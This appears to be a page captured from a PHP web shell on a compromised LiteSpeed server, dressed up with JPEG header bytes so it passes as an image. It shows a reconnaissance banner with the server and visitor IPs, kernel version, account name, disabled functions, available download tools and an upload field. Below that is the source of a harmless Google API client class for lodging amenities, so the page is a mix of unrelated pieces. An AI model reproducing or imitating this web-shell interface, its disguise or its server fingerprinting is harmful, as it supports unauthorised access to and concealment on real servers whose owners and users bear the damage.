����JFIF��x�x����'
Server IP : 78.140.185.180 / Your IP : 3.19.76.4 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/builderbox/www/vendor/google/apiclient-services/src/MyBusinessLodging/ |
Upload File : |
<?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Service\MyBusinessLodging; class LivingAreaFeatures extends \Google\Model { public $airConditioning; public $airConditioningException; public $bathtub; public $bathtubException; public $bidet; public $bidetException; public $dryer; public $dryerException; public $electronicRoomKey; public $electronicRoomKeyException; public $fireplace; public $fireplaceException; public $hairdryer; public $hairdryerException; public $heating; public $heatingException; public $inunitSafe; public $inunitSafeException; public $inunitWifiAvailable; public $inunitWifiAvailableException; public $ironingEquipment; public $ironingEquipmentException; public $payPerViewMovies; public $payPerViewMoviesException; public $privateBathroom; public $privateBathroomException; public $shower; public $showerException; public $toilet; public $toiletException; public $tv; public $tvCasting; public $tvCastingException; public $tvException; public $tvStreaming; public $tvStreamingException; public $universalPowerAdapters; public $universalPowerAdaptersException; public $washer; public $washerException; public function setAirConditioning($airConditioning) { $this->airConditioning = $airConditioning; } public function getAirConditioning() { return $this->airConditioning; } public function setAirConditioningException($airConditioningException) { $this->airConditioningException = $airConditioningException; } public function getAirConditioningException() { return $this->airConditioningException; } public function setBathtub($bathtub) { $this->bathtub = $bathtub; } public function getBathtub() { return $this->bathtub; } public function setBathtubException($bathtubException) { $this->bathtubException = $bathtubException; } public function getBathtubException() { return $this->bathtubException; } public function setBidet($bidet) { $this->bidet = $bidet; } public function getBidet() { return $this->bidet; } public function setBidetException($bidetException) { $this->bidetException = $bidetException; } public function getBidetException() { return $this->bidetException; } public function setDryer($dryer) { $this->dryer = $dryer; } public function getDryer() { return $this->dryer; } public function setDryerException($dryerException) { $this->dryerException = $dryerException; } public function getDryerException() { return $this->dryerException; } public function setElectronicRoomKey($electronicRoomKey) { $this->electronicRoomKey = $electronicRoomKey; } public function getElectronicRoomKey() { return $this->electronicRoomKey; } public function setElectronicRoomKeyException($electronicRoomKeyException) { $this->electronicRoomKeyException = $electronicRoomKeyException; } public function getElectronicRoomKeyException() { return $this->electronicRoomKeyException; } public function setFireplace($fireplace) { $this->fireplace = $fireplace; } public function getFireplace() { return $this->fireplace; } public function setFireplaceException($fireplaceException) { $this->fireplaceException = $fireplaceException; } public function getFireplaceException() { return $this->fireplaceException; } public function setHairdryer($hairdryer) { $this->hairdryer = $hairdryer; } public function getHairdryer() { return $this->hairdryer; } public function setHairdryerException($hairdryerException) { $this->hairdryerException = $hairdryerException; } public function getHairdryerException() { return $this->hairdryerException; } public function setHeating($heating) { $this->heating = $heating; } public function getHeating() { return $this->heating; } public function setHeatingException($heatingException) { $this->heatingException = $heatingException; } public function getHeatingException() { return $this->heatingException; } public function setInunitSafe($inunitSafe) { $this->inunitSafe = $inunitSafe; } public function getInunitSafe() { return $this->inunitSafe; } public function setInunitSafeException($inunitSafeException) { $this->inunitSafeException = $inunitSafeException; } public function getInunitSafeException() { return $this->inunitSafeException; } public function setInunitWifiAvailable($inunitWifiAvailable) { $this->inunitWifiAvailable = $inunitWifiAvailable; } public function getInunitWifiAvailable() { return $this->inunitWifiAvailable; } public function setInunitWifiAvailableException($inunitWifiAvailableException) { $this->inunitWifiAvailableException = $inunitWifiAvailableException; } public function getInunitWifiAvailableException() { return $this->inunitWifiAvailableException; } public function setIroningEquipment($ironingEquipment) { $this->ironingEquipment = $ironingEquipment; } public function getIroningEquipment() { return $this->ironingEquipment; } public function setIroningEquipmentException($ironingEquipmentException) { $this->ironingEquipmentException = $ironingEquipmentException; } public function getIroningEquipmentException() { return $this->ironingEquipmentException; } public function setPayPerViewMovies($payPerViewMovies) { $this->payPerViewMovies = $payPerViewMovies; } public function getPayPerViewMovies() { return $this->payPerViewMovies; } public function setPayPerViewMoviesException($payPerViewMoviesException) { $this->payPerViewMoviesException = $payPerViewMoviesException; } public function getPayPerViewMoviesException() { return $this->payPerViewMoviesException; } public function setPrivateBathroom($privateBathroom) { $this->privateBathroom = $privateBathroom; } public function getPrivateBathroom() { return $this->privateBathroom; } public function setPrivateBathroomException($privateBathroomException) { $this->privateBathroomException = $privateBathroomException; } public function getPrivateBathroomException() { return $this->privateBathroomException; } public function setShower($shower) { $this->shower = $shower; } public function getShower() { return $this->shower; } public function setShowerException($showerException) { $this->showerException = $showerException; } public function getShowerException() { return $this->showerException; } public function setToilet($toilet) { $this->toilet = $toilet; } public function getToilet() { return $this->toilet; } public function setToiletException($toiletException) { $this->toiletException = $toiletException; } public function getToiletException() { return $this->toiletException; } public function setTv($tv) { $this->tv = $tv; } public function getTv() { return $this->tv; } public function setTvCasting($tvCasting) { $this->tvCasting = $tvCasting; } public function getTvCasting() { return $this->tvCasting; } public function setTvCastingException($tvCastingException) { $this->tvCastingException = $tvCastingException; } public function getTvCastingException() { return $this->tvCastingException; } public function setTvException($tvException) { $this->tvException = $tvException; } public function getTvException() { return $this->tvException; } public function setTvStreaming($tvStreaming) { $this->tvStreaming = $tvStreaming; } public function getTvStreaming() { return $this->tvStreaming; } public function setTvStreamingException($tvStreamingException) { $this->tvStreamingException = $tvStreamingException; } public function getTvStreamingException() { return $this->tvStreamingException; } public function setUniversalPowerAdapters($universalPowerAdapters) { $this->universalPowerAdapters = $universalPowerAdapters; } public function getUniversalPowerAdapters() { return $this->universalPowerAdapters; } public function setUniversalPowerAdaptersException($universalPowerAdaptersException) { $this->universalPowerAdaptersException = $universalPowerAdaptersException; } public function getUniversalPowerAdaptersException() { return $this->universalPowerAdaptersException; } public function setWasher($washer) { $this->washer = $washer; } public function getWasher() { return $this->washer; } public function setWasherException($washerException) { $this->washerException = $washerException; } public function getWasherException() { return $this->washerException; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(LivingAreaFeatures::class, 'Google_Service_MyBusinessLodging_LivingAreaFeatures');